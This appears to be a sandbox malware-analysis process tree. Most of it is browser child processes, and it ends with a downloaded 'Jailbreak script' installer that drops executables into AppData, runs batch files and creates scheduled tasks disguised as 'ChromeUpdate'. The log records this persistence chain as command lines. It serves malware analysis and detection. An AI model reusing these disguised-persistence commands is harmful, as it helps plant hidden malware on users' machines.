"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=5332 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=5200 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:5372

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=7428 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:3596

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=6636 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:4872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=7392 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:5408

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7360 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:5428

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=5344 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:1016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=6112 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:3652

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=3412 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:6024

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=6372 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:3720

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6520 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:5152

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7076 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:1656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=7468 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:1
3⤵
PID:5264

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5384 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:6116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5760 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:1116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7260 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:1144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6832 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:4760

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6048 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:4112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7564 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:5960

C:\Users\Admin\Downloads\RobloxPlayerLauncher.exe
"C:\Users\Admin\Downloads\RobloxPlayerLauncher.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:5204

C:\Users\Admin\Downloads\RobloxPlayerLauncher.exe
C:\Users\Admin\Downloads\RobloxPlayerLauncher.exe --crashpad --no-rate-limit --database=C:\Users\Admin\AppData\Local\Temp\crashpad_roblox --metrics-dir=C:\Users\Admin\AppData\Local\Temp\crashpad_roblox --url=https://upload.crashes.rbxinfra.com/post --annotation=RobloxChannel=production --annotation=RobloxGitHash=d4a4a4ad1cbd35850c37a672e5c216b9b80fbbae --annotation=UploadAttachmentKiloByteLimit=100 --annotation=UploadPercentage=100 --annotation=format=minidump --annotation=token=a2440b0bfdada85f34d79b43839f2b49ea6bba474bd7d126e844bc119271a1c3 --initial-client-data=0x6f0,0x6d8,0x6dc,0x49c,0x6d4,0x11af748,0x11af758,0x11af768
4⤵
- Executes dropped EXE
PID:5644

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6752 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:5616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2896 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:1780

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5596 --field-trial-handle=1828,i,15137491680649995459,1755126623563343830,131072 /prefetch:8
3⤵
PID:2892

C:\Users\Admin\AppData\Local\Temp\Temp1_New jailbreak script - Linkvertise Downloader.zip\New jailbreak script - Linkvertise Downloader_51-dwu1.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_New jailbreak script - Linkvertise Downloader.zip\New jailbreak script - Linkvertise Downloader_51-dwu1.exe"
2⤵
PID:2192

C:\Users\Admin\AppData\Local\Temp\is-Q33D7.tmp\New jailbreak script - Linkvertise Downloader_51-dwu1.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q33D7.tmp\New jailbreak script - Linkvertise Downloader_51-dwu1.tmp" /SL5="$5041E,1785071,899584,C:\Users\Admin\AppData\Local\Temp\Temp1_New jailbreak script - Linkvertise Downloader.zip\New jailbreak script - Linkvertise Downloader_51-dwu1.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bstlar.com/MV/jailbreakscript
4⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xfc,0x124,0x7ffe72b246f8,0x7ffe72b24708,0x7ffe72b24718
5⤵
PID:1064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
5⤵
PID:1972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:8
5⤵
PID:5560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
5⤵
PID:4484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:1
5⤵
PID:6056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4844 /prefetch:1
5⤵
PID:3788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2072 /prefetch:1
5⤵
PID:732

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5836 /prefetch:8
5⤵
PID:1072

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
5⤵
PID:5064

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff74c675460,0x7ff74c675470,0x7ff74c675480
6⤵
PID:5788

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5836 /prefetch:8
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
5⤵
PID:4404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4072 /prefetch:1
5⤵
PID:3544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:1
5⤵
PID:5852

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
5⤵
PID:3324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
5⤵
PID:3644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1
5⤵
PID:1656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4088 /prefetch:1
5⤵
PID:2516

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
5⤵
PID:5332

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
5⤵
PID:3024

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
5⤵
PID:4260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1
5⤵
PID:808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1
5⤵
PID:724

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1400 /prefetch:1
5⤵
PID:4784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1852 /prefetch:1
5⤵
PID:5960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5768 /prefetch:8
5⤵
PID:5040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
5⤵
PID:5672

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6188 /prefetch:8
5⤵
PID:6044

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
5⤵
PID:5156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6320 /prefetch:1
5⤵
PID:5740

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5692 /prefetch:8
5⤵
PID:676

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:1
5⤵
PID:5936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7228 /prefetch:8
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:6044

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6756 /prefetch:8
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1144

C:\Users\Admin\Downloads\Jailbreak script (1).exe
"C:\Users\Admin\Downloads\Jailbreak script (1).exe"
5⤵
- Executes dropped EXE
PID:2156

C:\Users\Admin\AppData\Local\Temp\is-J7K4H.tmp\Jailbreak script (1).tmp
"C:\Users\Admin\AppData\Local\Temp\is-J7K4H.tmp\Jailbreak script (1).tmp" /SL5="$201F2,857904,780800,C:\Users\Admin\Downloads\Jailbreak script (1).exe"
6⤵
- Checks computer location settings
- Executes dropped EXE
PID:5544

C:\Users\Admin\Downloads\Jailbreak script (1).exe
"C:\Users\Admin\Downloads\Jailbreak script (1).exe" /SILENT
7⤵
- Executes dropped EXE
PID:5988

C:\Users\Admin\AppData\Local\Temp\is-21811.tmp\Jailbreak script (1).tmp
"C:\Users\Admin\AppData\Local\Temp\is-21811.tmp\Jailbreak script (1).tmp" /SL5="$301F2,857904,780800,C:\Users\Admin\Downloads\Jailbreak script (1).exe" /SILENT
8⤵
PID:4120

C:\Users\Admin\AppData\Local\MicroApp\EdgeInstall.exe
"C:\Users\Admin\AppData\Local\MicroApp\EdgeInstall.exe" install
9⤵
- Executes dropped EXE
PID:5344

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\MicroApp\edge.bat" install"
9⤵
PID:5448

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\MicroApp\reg.bat" install"
9⤵
PID:4028

C:\Users\Admin\AppData\Local\ServiceApp\ChromeInstall.exe
"C:\Users\Admin\AppData\Local\ServiceApp\ChromeInstall.exe" install
9⤵
- Checks computer location settings
- Executes dropped EXE
PID:5096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\ServiceApp\chrome.bat" "
10⤵
PID:5600

C:\Windows\system32\schtasks.exe
schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\ServiceApp\reg.xml" /tn ChromeUpdate
11⤵
- Creates scheduled task(s)
PID:920

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\ServiceApp\chrome.bat" install"
9⤵
PID:5912

C:\Windows\system32\schtasks.exe
schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\ServiceApp\reg.xml" /tn ChromeUpdate
10⤵
- Creates scheduled task(s)
PID:1928

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\ServiceApp\reg.bat" install"
9⤵
PID:5800

C:\Windows\system32\schtasks.exe
schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\ServiceApp\reg.xml" /tn ChromeUpdate
10⤵
- Creates scheduled task(s)
PID:4028

